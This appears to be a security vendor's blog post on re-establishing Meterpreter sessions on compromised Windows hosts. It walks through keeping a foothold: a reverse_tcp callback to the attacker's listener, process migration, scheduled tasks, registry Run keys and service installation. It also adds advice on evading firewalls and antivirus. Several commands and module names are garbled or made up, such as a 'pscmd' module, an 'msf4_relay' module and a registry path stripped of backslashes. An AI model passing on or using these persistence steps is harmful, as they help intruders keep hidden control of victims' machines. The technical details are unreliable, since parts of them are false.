Blog | G5 Cyber Security

Reopening Meterpreter Sessions

G5 Cyber Security

TL;DR

Yes, a meterpreter session can often be reopened, even after it appears to have ended. This is usually done by creating a persistent backdoor that automatically re-establishes the connection when the target system restarts or the original process terminates. The method depends on how the initial Meterpreter session was established.

How to Reopen Meterpreter Sessions

  1. Understand Session Types: First, know what kind of session you have.
    • Standard Sessions: These are tied to a specific process. If that process ends, the session is usually lost unless persistence is set up.
    • Backgrounded Sessions: These can survive network interruptions but still depend on the underlying process.
    • Persistent Sessions: Designed to automatically reconnect.
  2. Check for Persistence (Initial Check): Before attempting a reopen, see if persistence was already enabled. 
    msf6 > sessions -l

    Look at the ‘Persistent’ column. If it says ‘True’, the session should automatically reconnect on reboot.

  3. Using Meterpreter Persistence Modules: If persistence wasn’t initially set, you can add it *while the session is active*. Common modules include:
    • windows/meterpreter/reverse_tcp (and similar): This creates a new backdoor that connects back to your listener.
    • windows/meterpreter/msf4_relay: Useful for pivoting through networks.
    use windows/meterpreter/reverse_tcp
    set LHOST 
    set LPORT 
    run -j 1234  # Run as a job with ID 1234 (optional)
  4. Migrating to a More Stable Process: If your session is tied to an unstable process, migrate it. 
    migrate

    Replace with the process ID of a more reliable process (e.g., explorer.exe).

  5. Creating Scheduled Tasks: A robust persistence method.
    • Use Meterpreter’s pscmd module to create a scheduled task that runs your payload on startup or at regular intervals.
    use pscmd
    task add -a /path/to/payload.exe -t
  6. Registry Keys (for Startup): Add an entry to the registry’s Run keys.
    • This ensures your payload runs when the user logs in. Be careful, as this is easily detectable.
    reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v  /t REG_SZ /d /path/to/payload.exe
  7. Service Creation: Install your payload as a Windows service.
    • This is more persistent than scheduled tasks but requires higher privileges and can be more noticeable.
  8. Reconnecting After Reboot/Termination:
    1. If persistence is set up, your listener should automatically receive a new connection when the target system restarts or the original process ends.
    2. If it doesn’t reconnect immediately, wait a few minutes as some persistence mechanisms have delays.
    3. Check your listener logs for any errors.
  9. Troubleshooting:
    • Firewall: Ensure the firewall on the target system isn’t blocking connections to your listener port.
    • Antivirus/EDR: Antivirus or Endpoint Detection and Response (EDR) solutions may detect and block your payload.
    • Network Connectivity: Verify network connectivity between the target system and your listener.

Important Considerations

Persistence methods vary in their stealthiness and reliability. Choose a method that suits your needs and risk tolerance. Always test persistence mechanisms thoroughly to ensure they work as expected.

Exit mobile version